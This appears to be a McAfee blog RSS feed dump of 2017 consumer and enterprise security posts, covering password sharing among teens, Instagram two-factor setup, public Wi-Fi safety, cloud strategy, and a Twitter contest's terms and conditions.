Users of McAfee products are protected from this attack by signature 0x45c09700. All administrators should update OpenSSL to the latest version.

 

Thanks to Hardik Shah for helping me with this post.

 

 

 

 

The post Vulnerable OpenSSL Handshake Renegotiation Can Trigger Denial of Service appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/vulnerable-openssl-handshake-renegotiation-can-trigger-denial-service/feed/ 0
Pervasive Data Protection: Kick the Quick-Fix Habit and Go for a Unified Defense https://securingtomorrow.mcafee.com/business/safeguard-data/pervasive-data-protection-kick-quick-fix-habit-go-unified-defense/ https://securingtomorrow.mcafee.com/business/safeguard-data/pervasive-data-protection-kick-quick-fix-habit-go-unified-defense/#respond Tue, 09 May 2017 15:00:13 +0000 https://securingtomorrow.mcafee.com/?p=73327 The cloud is here to stay—and no one in the enterprise playing field would argue that point. Cloud adoption across nearly every business unit is a reality that CISOs have fully accepted. Now the big uphill battle for security professionals is how to gain visibility to and protect the vast quantity of vital data that …

The post Pervasive Data Protection: Kick the Quick-Fix Habit and Go for a Unified Defense appeared first on McAfee Blogs.

]]>
The cloud is here to stay—and no one in the enterprise playing field would argue that point. Cloud adoption across nearly every business unit is a reality that CISOs have fully accepted. Now the big uphill battle for security professionals is how to gain visibility to and protect the vast quantity of vital data that flows in, through, and beyond the four walls of their organizations—to and from endpoints, through the network, and into the cloud and back. The question becomes: How do you ensure that data is secured across a controlled environment (the corporate network), where you have pretty high level of visibility, and an uncontrolled environment (the cloud), where you have little or no visibility at all?

When Silver Bullets Misfire

When we look at how most IT organizations are addressing the four essential ingredients of data protection—data loss prevention (DLP), encryption, web technologies, and the latest security buzzword, cloud access security brokers (CASBs)—it probably comes as no surprise that they typically depend on one or two vendors for each area. In an effort to cover all the bases, organizations resort to the silver bullet approach. They purchase the hottest next new thing in data security and bolt it onto their infrastructure in hopes that this collection of solutions will do the job.

Though the best-of-breed path may work in the short term, it has its shortfalls and actually creates even more problems:

  • When you add more and more products, you’ll eventually have a huge—and costly—management burden. With the current scarcity of specialized security talent, will you be able to find the resources with the right skill set to manage these products? And even if you do, the cost of staffing up will mount quickly.
  • Unintegrated products from multiple vendors can’t communicate with one another, so visibility and threat intelligence sharing is limited or non-existent. Sure, you can engage consultants to brute-force integrations, but that’s an expensive proposition.
  • Policy modification and management becomes inconsistent and unwieldy. Some CASB solutions, for example, do a great job of analyzing data about security events gleaned from log files (which may live on a separate server) pushed out from web gateways. But they often have no way of sharing the information they’ve gleaned. Typically, they lack the ability to automatically go back and modify web access policies to define what data can be shared, who can share it, and where it can be shared.

A Simpler Solution

Most organizations have had little choice but to go down this path, as they’ve had few viable alternatives. But, as we’ve seen, silver bullet solutions are only a temporary fix.

The best way to overcome the issues we’ve mentioned is an open framework that allows technologies to communicate with one another and unified single pane-of-glass management capabilities that allow for complete visibility—from the internal network to the cloud and back.

In the near future, you’ll see new advancements in more automated pervasive data protection through a unified architecture that brings together the four pillars of data protection across endpoints, the network, the cloud, and mobile. There are two key components of this simplified approach to pervasive data protection:

Centralized management:

  • Instead of disparate, non-compatible management consoles for web gateways, CASB, encryption, and DLP, centralized management unifies all data security technologies using a common platform, a common user interface, and common policies. You can synchronize data control policies in the cloud with those on premises for increased consistency. And, you actually need fewer policies. You can easily apply these to the network, endpoints, and the cloud—all from a single console. Maintenance is also easier. One administrator can do it all, so there’s no need to invest in additional staff.

Threat intelligence sharing:

  • This model also includes a communications fabric that enables information sharing with your endpoint protection suite, endpoint DLP, encryption and cloud Data Protection for faster and more accurate detection, protection, and correction.

It will become obvious soon enough that a best-of-breed approach to data protection is really more tactical than strategic, as it’s really only a stopgap measure. Security professionals can take heart now that they know there’s another choice on the horizon that provides them with greater visibility, ease of management, and simplified policy creation. Are you ready to take the leap?

 

For additional information about our product solutions, please visit our site: www.mcafee.com/pervasivedataprotection

The post Pervasive Data Protection: Kick the Quick-Fix Habit and Go for a Unified Defense appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/safeguard-data/pervasive-data-protection-kick-quick-fix-habit-go-unified-defense/feed/ 0
What Else Kids Give Away When They Share Their Personal Passwords https://securingtomorrow.mcafee.com/consumer/family-safety/kids-give-away-share-passwords/ https://securingtomorrow.mcafee.com/consumer/family-safety/kids-give-away-share-passwords/#respond Tue, 09 May 2017 14:00:08 +0000 https://securingtomorrow.mcafee.com/?p=73419 Tweens and teens share clothes, secrets, and homework notes but there’s something else your kids may be sharing that isn’t so wise — their passwords. Password sharing has become a symbol of trust between friends and a sign of intimacy between significant others so much so that most teens aspire to password sharing as “relationship …

The post What Else Kids Give Away When They Share Their Personal Passwords appeared first on McAfee Blogs.

]]>

Tweens and teens share clothes, secrets, and homework notes but there’s something else your kids may be sharing that isn’t so wise — their passwords.

Password sharing has become a symbol of trust between friends and a sign of intimacy between significant others so much so that most teens aspire to password sharing as “relationship goals.”

Ask the dozen oft-surveyed teens in my world, and they happily explain that password sharing is “no big deal,” “fun,” and “what friends do.” Sharing also “proves to people you trust them” and is “the best way to keep tabs” on a significant other. 

But before you cringe at this seemingly naive behavior, wait. A recent survey World Password Day from McAfee, reveals that 59% of people surveyed are comfortable sharing their passwords with other people. People share passwords with spouse/partner (37%), family (23%), parents (23%) and even friends (9%) and colleagues (5%). The survey, which canvassed 3,000 people ages 18 and over, also exposes that 34% re-use the same or similar passwords on multiple accounts and that most people keep track of their passwords by writing them down and keeping them somewhere safe (37%). Another study from Pew Institute echoes these recent findings stating that 67% of Internet users in marriages or relationships have shared passwords with one or more of their accounts with their partner.

But is sharing your password such a good idea? Arguments exist on either side.

Obvious reasons emerge in the headlines each week to remind us why we shouldn’t share passwords. The heartbreak publically plays out in betrayal, revenge, cruel jokes, reputation damage, financial and identity theft, and, sadly even sextortion.

There are also the larger reasons for not sharing passwords that likely aren’t even on your child’s radar such as guarding the value and power of personal privacy and boundaries.

Family Talking Points

Boundaries matter. Keeping personal passwords private helps kids exercise healthy boundaries. Not all personal things need to be shared in a relationship, no matter how close two people may be. Maintaining independence in any relationship is a good thing. In the best-selling book Boundaries, Drs. Henry Cloud and John Townsend define a boundary as “a personal property line that marks those things for which we are responsible. In other words, boundaries define who we are and who we are not.”

Establishing boundaries helps children (and adults) understand and take responsibility for the things over which they have control. The boundaries we draw (such as privacy) begin to define us and what we believe about our values and standards. By forfeiting boundaries around the issue of privacy, kids can develop destructive behavior patterns in relationships.

Privacy is honoring. Allowing friends and significant others to maintain password privacy, honors the personal space and possessions of another person. While kids may believe sharing passwords builds trust, a friend would not require you to give away your privacy to prove the depth of a relationship. Relationships require respect for a person’s material, emotional, and physical boundaries.

Pressure isn’t love. Peer pressure can come in many forms, even requests for a password. A simple request to “hey, I need to Google something, what’s your lock screen password?” can make one person in a relationship vulnerable to material and emotional risks. A friendship or relationship can become bullish, controlling, and one in which the “monitored” party develops a need to please.

People change. As much as kids pledge undying loyalty to one another (“he’d never do anything to hurt my reputation!”), even the strongest bonds can surprisingly break, and the strength of the emotions that follow can be startling. Encourage kids to share some things but not all things, especially anything that can be used against them later. It’s just not wise.

No shortcuts to trust. Websters defines trust as “a firm belief in the reliability, truth, ability, or strength of someone or something.” To have a firm belief in anything or anyone is a process that takes time and experience. So, it stands to reason, that the act of sharing passwords does not instantly make a relationship trustworthy. In a relationship, a person’s consistent character over time is what builds trust. There are no shortcuts to trust.

Reclaiming privacy. This generation is often defined by the media as the generation that’s willing to share everything online. That opinion does not have to be your child’s reality. If your child (or you) constantly puts others needs first, has trouble saying no, and believes that setting healthy boundaries in a relationship could jeopardize it, then he or she may be a co-dependent person. Co-dependent people don’t honestly feel they have rights because they have given them all away. Slowly, over time, they have moved if not eliminated, their personal boundaries. It’s never too late to change this picture and help your child learn how to establish healthy boundaries. Healthy boundaries include: Having clear opinions and preferences and acting upon them, feeling safe and secure in relationships, being aware of personal choice in relationships, being able to identify manipulative behaviors in others.

Password Reminders. Change your passwords every few months — start today. A strong password has all of the following characteristics:

  • It is at least ten characters in length
  • It doesn’t contain any word or words found in the dictionary
  • It mixes capital and lower-case letters
  • It contains special characters like numbers, punctuation marks, or symbols

Don’t get lazy with your passwords. The most common mistake consumers make is using the same password for all or most online accounts. So do this: Take an hour out of your day and change and document all of your passwords. Once you’ve beefed up your passwords, you can simplify the password process by using True Key multi-factor authentication service (hey — it’s also free)!

Want to have a little fun? McAfee has created the True Key Game to celebrate World Password Day. Share this game with your kids to help them learn more about password security.

~~~

A note on boundaries: It may help kids to identify a healthy boundary as an imaginary force field that separates their responsibilities and opinions from those of others. This force field separates what’s theirs and what’s others; what they believe and value and what others believe and value. Imagining this force field more clearly may help kids from feeling guilty for not conforming and free them up from taking negative comments personally.

As tough as it is to witness, your kids will experience heartbreak, betrayal, and broken trust. You can’t stop that. What you can stop is the depth of potential fallout by teaching the priceless value of privacy and keeping passwords under lock and key.

ToniTwitterHS

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The post What Else Kids Give Away When They Share Their Personal Passwords appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/kids-give-away-share-passwords/feed/ 0
Instagram Has Hopped Aboard the Two-Factor Authentication Train https://securingtomorrow.mcafee.com/consumer/mobile-security/instagram-two-factor-authentication/ https://securingtomorrow.mcafee.com/consumer/mobile-security/instagram-two-factor-authentication/#respond Tue, 09 May 2017 13:00:57 +0000 https://securingtomorrow.mcafee.com/?p=73671 With over 500 million users, Instagram has quickly become one of the top dogs of social media. Between the many features that combine the best of Facebook and Snapchat and a gorgeous, visual interface that lets you share your thoughts in over 140 characters, I understand why so many people are turning to the platform …

The post Instagram Has Hopped Aboard the Two-Factor Authentication Train appeared first on McAfee Blogs.

]]>
With over 500 million users, Instagram has quickly become one of the top dogs of social media. Between the many features that combine the best of Facebook and Snapchat and a gorgeous, visual interface that lets you share your thoughts in over 140 characters, I understand why so many people are turning to the platform to communicate with friends and family through daily posts, direct messages, and live video streaming. But, as the age-old saying going, “with great power comes great responsibility.” As the platform gains more users every week and becomes a growing target for hackers, Instagram has a responsibility to their users to increase security measures to maintain user privacy.

After a long-awaited increase in account security, Instagram has finally released a two-factor authentication capability, so that users can up their level of personal security hygiene. Two-factor and multi-factor authentication are terms that have been thrown around a lot recently, with Twitter having added support for 2FA apps, and now Instagram introducing a system of its own into the login process. In case you need a refresher on the difference between the two (or need a quick overview of what they mean to begin with), here’s a quick guide. 

Two-Factor Authentication

Used to add a layer of security to online accounts, two-factor authentication asks for another piece of information after a user enters their password to log in (this is their first verification factor). The second factor can range from a question asking for something the user already knows (like a password, PIN, zip code, or mother’s maiden name), to a biometric verification like a fingerprint, to a confirmation number sent through an SMS message.

This is the most common type of verification, and I’m sure almost all of us have received single-use codes from some of our favorite apps and websites to confirm our identity. Though Twitter, LinkedIn, Facebook, and Instagram all offer 2FA logins, it’s not just social networking sites that offer the extra protection. Amazon, Dropbox, Apple, Microsoft, Google, and PayPal all allow users to switch on two-factor verification. This quick guide explains how to switch it on for all your favorite platforms.

Multi-factor Authentication

Two-factor authentication is a great option, of course, if the only other choice is to have single-factor authentication for your login. However, multi-factor authentication, or MFA, essentially protects your personal account information with more than two locks, and is always the best option when given a choice. Hackers find it much less appealing to try to hack in to a personal account that’s been safeguarded with multi-factor authentication, because it won’t be simple. The True Key App is a great example of a system that uses MFA to ensure maximum security for your stored passwords.

Now, how can you turn on the new 2FA feature for your Instagram account? Here’s a quick, step-by-step guide to setup:

  • Open the Instagram app on your phone, then go to your profile page.
  • Click on the three dots in the upper-right corner, and go to Settings.
  • Scroll down to the “require security code” option, and select “Turn On”.
  • You’re all set, and so much more secure!

Setting up multi- or two-factor authentication systems on all accounts may seem like an extra or unnecessary step, but it’s quite the contrary. The extra step of checking for a verification code, providing a thumbprint, or answering an extra question or two before getting into your account is worth the protection against account hacks. In the meantime, organizations are working to make identity verification quick and easy (while equally secure), to minimize the “hassle” that can come with requiring multiple layers of authentication to gain access to your accounts.  Until then—I think we can all agree it’s worth spending that extra minute or two to make sure our accounts are 100% locked down.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post Instagram Has Hopped Aboard the Two-Factor Authentication Train appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-security/instagram-two-factor-authentication/feed/ 0
How to protect your data when using public Wi-Fi https://securingtomorrow.mcafee.com/business/safeguard-data/how-to-protect-your-data-when-using-public-wi-fi/ Mon, 08 May 2017 20:39:32 +0000 https://securingtomorrow.mcafee.com/?p=73664 Many people are not aware of this, but Wi-Fi hotspots at Starbucks, Barnes & Noble or your local hotel that offers it as a complimentary service are not safe for confidential browsing, performing financial transactions or for viewing your emails. Public Wi-Fi does not offer encryption for individuals using the same password and hotspot. Also, …

The post How to protect your data when using public Wi-Fi appeared first on McAfee Blogs.

]]>
Many people are not aware of this, but Wi-Fi hotspots at Starbucks, Barnes & Noble or your local hotel that offers it as a complimentary service are not safe for confidential browsing, performing financial transactions or for viewing your emails.

Public Wi-Fi does not offer encryption for individuals using the same password and hotspot. Also, your signals are broadcast across the immediate area. It is easy for someone else within your vicinity to eavesdrop on your communication. An unskilled hacker can intercept your signal using a phony hotspot or a tampering software that can be found on a search engine.

The first task of a hacker is to get on the same network as the potential victim, then they can carry out that task with a public Wi-Fi network because they have the password. It does not matter if a network password is given out by the cashier or printed in your hotel room’s welcome packet, once public, your security is compromised.

Many public Wi-Fi connections use Wi-Fi Protected Access 2 (WPA2), a secure protocol for encrypting traffic between the wireless AP and the client. Many people think having this encryption secures their traffic, but they do not realize anyone who has the password can still snoop on the packets that traverse over the network.

Attackers can obtain a lot of information when eavesdropping on your Wi-Fi network connection. They can capture your passwords and content for sites that you sign into that do not require Secure Sockets Layer (SSL) encryption. Also, they can easily capture your email and file transfers that do not have any encryption applied. An attacker can also capture voice communication across Wi-Fi and replay it.

Software used to eavesdrop can be easily obtained on the internet and does not require a lot of technical skills to operate. This helps contribute to public Wi-Fi hotspots being more popular attack targets than some personal or private networks.

4 actions to secure your data on a public Wi-Fi

  • The best way to secure your traffic while using public Wi-Fi is to use a virtual private network (VPN). When connected, all your internet traffic is sent from your computer through an encrypted tunnel to the provider’s endpoint. The traffic is secure from any local eavesdroppers on the public Wi-Fi network. These public VPN services typically cost only $5-$20 per month. There is even software available on mobile phones that will enable a VPN to start automatically when connecting to a public Wi-Fi hotspot. The primary complaint when using a VPN is it can slow down your connection speed by 25 to 50 percent.
  • If you do not have a VPN configured, make sure that each time you connect to a website over a public Wi-Fi your session is encrypted. In your URL field, you should see HTTPS and not HTTP. You also want to make sure the entire session remains encrypted while you are browsing. There are some sites that will encrypt your login and then later during the session will send you to an HTTP connection, which will make you vulnerable to a hijacking attack. There are some sites that will give you an option to encrypt your entire session. It is best to encrypt the entire session.
  • Never perform a file transfer protocol (FTP) transaction over a public Wi-Fi. Also avoid using any other protocols that transfer data in an unsecured manner unless you have a VPN established. You can consider using secure FTP, which would encrypt your session. Also, for email client programs, you need to verify that SSL is being used for IMAP, POP3 and SMTP server connections.
  • A very common attack involves a hacker setting up a public Wi-Fi hotspot of their own near the site of the public Wi-Fi. It will likely have a similar name to the legitimate one the business uses. The problem is that all your browsing activity is being routed through the attacker’s network, which would enable them to monitor the traffic. To avoid this, always verify the exact name of the hotspot’s SSID from the business hosting it. Also, make sure you do not see two access points with the same name.

Wi-Fi eavesdropping is growing as an attack vector because more public Wi-Fi hotspots are being installed. Many cities, such as San Francisco and New York, offer free Wi-Fi at various public locations, and more people are taking advantage of it.

The problem is it is very easy for novice hackers to obtains personal information from these public hotspots. Users should consider using a VPN when connecting to a public Wi-Fi hotspot because the benefits of this protection far outweigh the cost of being compromised.

 

This article was written by Mark Dargin from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post How to protect your data when using public Wi-Fi appeared first on McAfee Blogs.

]]>
CIOs: You need to have the cloud talk with your staff https://securingtomorrow.mcafee.com/executive-perspectives/cios-need-cloud-talk-staff/ https://securingtomorrow.mcafee.com/executive-perspectives/cios-need-cloud-talk-staff/#respond Mon, 08 May 2017 16:15:23 +0000 https://securingtomorrow.mcafee.com/?p=73656 CIOs, it is time to have a frank and open discussion with your staff. This conversation may be difficult or awkward, as it involves topics such as consent, privacy, and appropriate protection. Yes, you need to speak with your staff about the organization’s cloud strategy, and any deployment or security issues that they are facing. …

The post CIOs: You need to have the cloud talk with your staff appeared first on McAfee Blogs.

]]>
CIOs, it is time to have a frank and open discussion with your staff. This conversation may be difficult or awkward, as it involves topics such as consent, privacy, and appropriate protection. Yes, you need to speak with your staff about the organization’s cloud strategy, and any deployment or security issues that they are facing.

Cloud First strategies are predominantly driven from the top-down, per McAfee’s 2017 cloud adoption and security report  However, for many of the organizations involved in the study, there appears to be a slight disconnect between the C-suite and staff. Overall, C-level executives, such as CIOs, CSOs, and CISOs, displayed a more positive attitude towards cloud-based operations than the non-executive respondents.

Within your organization, it is important to uncover any gaps in perception and determine what is causing them. Are the reasons for a Cloud First strategy not getting clearly communicated down the chain? Are your staff seeing operational issues that are not making it to your office? Or is your staff concerned that cloud adoption is putting their jobs at risk.

The McAfee 2017 cloud study provides some valuable clues and discussion points for your staff meeting. Based on the survey results, 92% of execs stated that they are following a Cloud First strategy, but only 80% of staff agreed. There were also significant gaps in the number and types of cloud services in use, amount of sensitive data stored in the cloud, and plans for future cloud investments. An organization-wide inventory of cloud services in use, data types and locations, and budgets would be an excellent way to start the meeting. The results of this inventory will likely surprise most people in the room, and form the foundation for a discussion of operational and staffing concerns.

According to the survey, the biggest gaps in operational concerns between staff and executives relate to costs, compliance, unauthorized access, and Shadow IT. Staff were more concerned about costs than executives, which may be directly related to lack of information about budget plans, mentioned above. However, staff were also more concerned about unauthorized access to sensitive data and their ability to maintain compliance with regulations than the execs. These concerns should be the focus of a deep dive across the organization, to identify whether there are significant gaps in security and privacy controls. At the same time, executives were more concerned about Shadow IT than staff. When Shadow IT apps are found, staff were more likely to favor blocking access to unauthorized applications, while execs preferred data loss prevention tools. Depending on the results of y our discussion, clear communication throughout the organization about the risks and consequences of Shadow IT appears to be needed.

Finally, staff may feel that they lack the necessary job skills for a Cloud-First IT department. Over half of the executives reported that they have slowed their cloud adoption due to a skills shortage, and almost a third reported that they are continuing despite a skills shortage. However, the execs ranked this concern lower than staff did, which may be inadvertently sending the message down the chain that staffing changes are coming. Based on earlier research from McAfee, it is easier and more effective to invest in security training for existing staff than to find and hire experienced security professionals.

The transformation to cloud services is having a significant impact on the efficiency and effectiveness of organizations of all sizes, and the IT department is probably impacted more than most. Based on the results of this study, there are some small but possibly significant gaps between C-level executives and their staff, that should be addressed before they impact the organization’s security posture.

For more details on cloud adoption and security, download the 2017 McAfee cloud report, Building Trust in a Cloudy Sky.

The post CIOs: You need to have the cloud talk with your staff appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/executive-perspectives/cios-need-cloud-talk-staff/feed/ 0
Can You Spot the “Misaligned Lie?” Contest Terms and Conditions https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/ https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/#respond Mon, 08 May 2017 15:00:42 +0000 https://securingtomorrow.mcafee.com/?p=73623 Remember the old-school icebreaker “Two Truths and a Lie?” Well, in honor of our Misaligned Incentives Report, we’re asking you to spot the “Misaligned Lie!” Put your knowledge to the test with this version of “Two Truths and a Lie” and you could win an Amazon Gift Card! From May 8th-11th we’ll share “Two Truths …

The post Can You Spot the “Misaligned Lie?” Contest Terms and Conditions appeared first on McAfee Blogs.

]]>
Remember the old-school icebreaker “Two Truths and a Lie?” Well, in honor of our Misaligned Incentives Report, we’re asking you to spot the “Misaligned Lie!” Put your knowledge to the test with this version of “Two Truths and a Lie” and you could win an Amazon Gift Card!

From May 8th-11th we’ll share “Two Truths and a Lie” posts on @McAfee. Your job is to reply to us with which answer you think is the lie. Once you tweet us your correct answer, you’ll be automatically entered to win a $100 Amazon Gift card! After the contest, we will select 4 winners who tweeted the correct answer, and notify them via direct message.

So head over to twitter to catch the “Misaligned Lie” (and if you haven’t already read our Misaligned Incentives Report and study up)!

For full contest details please see the Terms and Conditions below:

 Misaligned Incentives “Two Truths and a Lie” Contest

  1.   How to enter:

No purchase necessary. A purchase will not increase your chances of winning. McAfee Misaligned Incentives “Two Truths and a Lie” Contest Terms and Conditions will be conducted during one week, each day being the start of a new entry period. All entries for each day of the Misaligned Incentives “Two Truths and a Lie” Contest must be received during the time period allotted for that Misaligned Incentives “Two Truths and a Lie” Contest. Pacific Daylight Time shall control the Misaligned Incentives “Two Truths and a Lie” Contest. One winner will be chosen after the four days of the Misaligned Incentives “Two Truths and a Lie” Contest. The Misaligned Incentives “Two Truths and a Lie” Contest is as follows:

Misaligned Incentives “Two Truths and a Lie” Contest – One Week 4 Winners

  • Monday, May 8th 9am –  Friday, May 12th 6pm PST
    • 5 winners announced Monday, May 15th @ 3pm PST

On each of the days listed above, there will be 1 tweet from @McAfee with a sharecard for participates to reply to.

For each Misaligned Incentives “Two Truths and a Lie” Contest, participants must complete the following steps during the time allotted for the Misaligned Incentives “Two Truths and a Lie” Contest:

  1. Reply to the @McAfee or Social Reply Contest tweet with the correct “lie.”
  2. Your answer must be in the form of a reply to @McAfee in order to be successfully submitted.

Four winners will be chosen for the Misaligned Incentives “Two Truths and a Lie” Contest from the viable pool of entries that replied to the correct tweet. McAfee (“Sponsor”) and its McAfee social team will randomly choose a winner eligible and correct entries. The winners of each day will be announced by 3:00pm PDT on Monday, May 15th on the @McAfee  twitter handle.  No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per contest. Participants are only eligible to win one day of the five days.  

  1.   Eligibility:

The Misaligned Incentives “Two Truths and a Lie” Contest is open to all people who are 18 years of age or older on the date the Misaligned Incentives “Two Truths and a Lie” Contest begins and live in a jurisdiction where this prize and Misaligned Incentives “Two Truths and a Lie” Contest are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  1. Winner Selection: 

Five (5) total winners, will be selected from the eligible entries received during each of the Misaligned Incentives “Two Truths and a Lie” Contest periods. By participating, entrants agree to be bound by the Official Misaligned Incentives “Two Truths and a Lie” Contest and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com at or around 3:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  1.   Prizes: 

The prize for each Misaligned Incentives “Two Truths and a Lie” Contest is a $100 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  1.   General conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Misaligned Incentives “Two Truths and a Lie” Contest, or by any technical or human error, which may occur in the processing of the Misaligned Incentives “Two Truths and a Lie” Contest entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the Misaligned Incentives “Two Truths and a Lie” Contest, any prize won, any misuse or malfunction of any prize awarded, participation in any Misaligned Incentives “Two Truths and a Lie” Contest-related activity, or participation in the Misaligned Incentives “Two Truths and a Lie” Contest. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases:

By entering the Contest, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Contest or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE CONTEST OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE CONTEST OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  1. Use of Use of Winner’s Name, Likeness, etc.:Except where prohibited by law, entry into the Contest constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation.  By entering this Contest, you consent to being contacted by Sponsor for any purpose in connection with this Contest.

Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize Misaligned Incentives “Two Truths and a Lie” Contest rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each Misaligned Incentives “Two Truths and a Lie” Contest.

Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law &  Disputes:

EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS CONTEST OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy:

Personal information obtained in connection with this prize Misaligned Incentives “Two Truths and a Lie” Contest will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 12th2017 and before May 11th 2018 to the address listed below, Attn: Misaligned Incentives “Two Truths and a Lie” Contest.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Margie Easter.  VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Contest and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd.Santa Clara, CA 95054 USA

 

The post Can You Spot the “Misaligned Lie?” Contest Terms and Conditions appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/feed/ 0
Missverhältnis der Anreize #IncentiveQuiz https://securingtomorrow.mcafee.com/languages/german/missverhaltnis-der-anreize-incentivequiz/ https://securingtomorrow.mcafee.com/languages/german/missverhaltnis-der-anreize-incentivequiz/#respond Fri, 05 May 2017 09:00:45 +0000 https://securingtomorrow.mcafee.com/?p=73607 Der Kampf um die Cyber-Sicherheit zwischen den berüchtigten Black Hats und den White Hats aufseiten der Verteidiger erinnert an ein Katz-und-Maus-Spiel. Im Moment scheinen die Black Hats den White Hats stets einen Schritt voraus zu sein, doch das Feld ist ständig in Bewegung. Doch was motiviert die beiden Seiten? Testen Sie mit unserem aktuellen #IncentiveQuiz …

The post Missverhältnis der Anreize #IncentiveQuiz appeared first on McAfee Blogs.

]]>
